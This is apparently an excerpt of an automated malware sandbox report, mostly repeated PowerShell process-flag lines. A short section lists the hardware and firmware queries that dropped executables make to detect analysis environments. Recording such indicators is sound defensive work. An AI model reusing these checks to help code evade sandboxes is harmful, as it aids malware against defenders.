                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX

                              Malware Analysis System Evasion

                              barindex
                              Source: C:\Users\user\AppData\Local\Temp\1074058001\kUHbhqh.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_PhysicalMemory
                              Source: C:\Users\user\AppData\Local\Temp\1074058001\kUHbhqh.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Users\user\AppData\Local\Temp\1074058001\kUHbhqh.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_DiskDrive
                              Source: C:\Windows\System32\regsvr32.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_DiskDrive
                              Source: C:\Windows\System32\regsvr32.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_DiskDrive
                              Source: C:\Users\user\AppData\Local\Temp\1074058001\kUHbhqh.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_PhysicalMemory
                              Source: C:\Users\user\AppData\Local\Temp\1074059001\Ryu8yUx.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_VideoController
                              Source: C:\Users\user\AppData\Local\Temp\1074059001\Ryu8yUx.exeSystem information queried: FirmwareTableInformation
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exeSystem information queried: FirmwareTableInformation
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exeSystem information queried: FirmwareTableInformation
